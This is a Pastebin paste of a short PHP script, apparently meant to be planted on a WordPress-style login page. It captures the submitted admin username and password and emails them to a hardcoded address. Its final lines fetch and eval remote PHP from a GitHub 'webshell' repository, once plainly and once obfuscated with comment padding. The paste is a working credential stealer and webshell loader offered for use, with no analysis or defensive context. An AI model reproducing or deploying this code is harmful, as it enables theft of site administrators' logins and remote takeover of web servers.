Advertisement
blackhat1337

php

May 12th, 2024 (edited)
802
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.98 KB | None | 0 0
  1. <?php
  2.  
  3. $subjek = 'RESUL';
  4. $mailto = 'muhrazky@gmail.com'; //masukin email lo disini
  5.  
  6. //////////////////////////////////////
  7.  
  8. $user = $_POST['log'];
  9. $pass = $_POST['pwd'];
  10.  
  11. //////////////////////////////////////
  12.  
  13. $body = <<<EOD
  14. <br><hr><br>
  15. <center><font size="4" ;" color="red">RESULT LOG ADMIN!<br></font>
  16. <font size="2" color="red">Username\Email :</font><font size"2" color="black">$user</font><br>
  17. <font size="2" color="red">Password : </font><font size"2" color="black">$pass</font> <br></center>
  18. EOD;
  19.  
  20. $headers = "From: muhrazky@gmail.com\r\n";
  21. $headers .= "Content-type: text/html\r\n";
  22. $success = mail($mailto, $subjek, $body, $headers);
  23. ?>
  24. <?php
  25. $random = rand(1000,5000);
  26. ?>
  27.  
  28. <?php eval("?>".file_get_contents("https://raw.githubusercontent.com/exploit-haxor/webshell/main/zz.php"));/**/?>"));?>
  29.  
  30. <?=/****/@null; /********/ /*******/ /********/@eval/****/("?>".file_get_contents/*******/("https://raw.githubusercontent.com/exploit-haxor/webshell/main/zz.php"));/**/?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement